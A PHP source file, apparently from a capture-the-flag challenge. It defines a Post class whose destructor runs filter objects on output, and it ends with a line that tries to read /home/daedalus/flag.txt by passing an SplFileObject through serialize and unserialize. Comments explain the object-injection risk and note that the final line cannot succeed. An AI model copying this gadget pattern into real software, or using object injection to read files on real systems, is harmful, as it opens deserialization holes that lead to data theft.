- unserialize: documentation ( source)
- serialize: documentation ( source)
- htmlspecialchars: documentation ( source)
<?php
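/**
 * A post made of a title, a body text and a list of filter objects.
 *
 * Security notes for maintainers:
 *  - __destruct() has side effects: it echoes output and calls filter() on
 *    every element of $filters. PHP runs destructors on objects created by
 *    unserialize(), and unserialize() fills the properties without calling
 *    __construct(). If serialized data from an untrusted source is ever
 *    deserialized while this class is loaded, $title, $text and $filters
 *    are whatever that data says. Do not unserialize() untrusted input;
 *    use a data-only format such as JSON, or restrict the permitted
 *    classes with unserialize()'s `allowed_classes` option.
 *  - Filters run AFTER escaping, so whatever a filter returns is emitted
 *    unescaped. Filters must return HTML-safe text.
 */
class Post
{
    // Title of the post; HTML-escaped whenever it is output.
    protected $title;

    // Body of the post; converted to a string and HTML-escaped on output.
    protected $text;

    // Iterable of objects exposing filter($text); applied in order.
    protected $filters;

    /**
     * @param mixed $title   Title of the post.
     * @param mixed $text    Body of the post (anything htmlspecialchars() can take as a string).
     * @param mixed $filters Iterable of objects with a filter($text) method.
     */
    public function __construct($title, $text, $filters)
    {
        $this->title = $title;
        $this->text = $text;
        $this->filters = $filters;
    }

    /**
     * @return string The HTML-escaped title.
     */
    public function get_title()
    {
        return $this->escape($this->title);
    }

    /**
     * @return string The HTML-escaped text after every filter has been applied.
     */
    public function display_post()
    {
        return $this->render_text();
    }

    /**
     * Debugging aid: echoes the post inside an HTML comment when the object
     * is destroyed. This also fires for instances produced by unserialize().
     */
    public function __destruct()
    {
        // NOTE(review): filter output is not escaped, so a filter that returns
        // "-->" would end this comment early; confirm filters cannot do that.
        echo "<!-- POST " . $this->escape($this->title) . ": " . $this->render_text() . " -->";
    }

    /**
     * Escapes a value for HTML output.
     *
     * The flags are passed explicitly because the default flags of
     * htmlspecialchars() differ between PHP versions: before 8.1 single
     * quotes were left unescaped and invalid byte sequences produced an
     * empty string.
     *
     * @param mixed $value Value to escape.
     * @return string
     */
    private function escape($value)
    {
        return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE);
    }

    /**
     * Escapes the text, then passes it through each filter in order.
     * Shared by display_post() and __destruct(), which previously each
     * carried a copy of this loop.
     *
     * @return string
     */
    private function render_text()
    {
        $rendered = $this->escape($this->text);
        foreach ($this->filters as $filter) {
            $rendered = $filter->filter($rendered);
        }

        return $rendered;
    }
}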
// Builds a Post whose text is an SplFileObject opened on
// /home/daedalus/flag.txt (with an empty filter list), passes it through
// serialize() and unserialize(), and echoes the result.
// NOTE(review): Post declares no __toString() in this file, so echoing the
// object returned by unserialize() cannot succeed as written.
// NOTE(review): presumably serialize() refuses the SplFileObject held in
// $text (built-in file handles are not serializable) — confirm.
// Post::__destruct() runs for every Post instance destroyed, including any
// copy created by unserialize(); this is why unserialize() must never be
// fed data that an untrusted party controls.
echo unserialize(serialize(new Post("huehuehue i repor u", new SplFileObject("/home/daedalus/flag.txt"), Array())));